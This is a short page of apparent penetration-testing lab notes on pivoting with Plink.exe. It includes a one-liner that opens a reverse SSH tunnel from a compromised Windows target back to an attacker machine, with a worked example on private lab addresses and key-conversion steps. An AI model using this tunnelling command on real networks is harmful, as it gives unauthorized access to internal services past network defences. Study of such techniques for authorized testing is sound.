Plink.exe

  • Is a Windows command line version of the PuTTY SSH client

  • Our use of Plink tends to be a case of transporting the binary to the target, then using it to create a reverse connection.

  • This would be done with the following command:

cmd.exe /c echo y | .\plink.exe -R LOCAL_PORT:TARGET_IP:TARGET_PORT USERNAME@ATTACKING_IP -i KEYFILE -N

  • To use our example from before, if we have access to 172.16.0.5 and would like to forward a connection to 172.16.0.10:80 back to port 8000 our own attacking machine (172.16.0.20), we could use this command:

cmd.exe /c echo y | .\plink.exe -R 8000:172.16.0.10:80 kali@172.16.0.20 -i KEYFILE -N

  • Note that any keys generated by ssh-keygen will not work properly here.

  • You will need to convert them using the puttygen tool, which can be installed on Kali using sudo apt install putty-tools. After downloading the tool, conversion can be done with:

puttygen KEYFILE -o OUTPUT_KEY.ppk

Note plink.exe

  • Plink is notorious for going out of date quickly, which often results in failing to connect back. Always make sure you have an up to date version of the .exe. Whilst there is a copy pre-installed on Kali at /usr/share/windows-resources/binaries/plink.exe

  • Download the latest

  • https://www.chiark.greenend.org.uk/~sgtatham/putty/latest.html

PreviousSSH Tunneling and Port ForwardingNextsocat

Last updated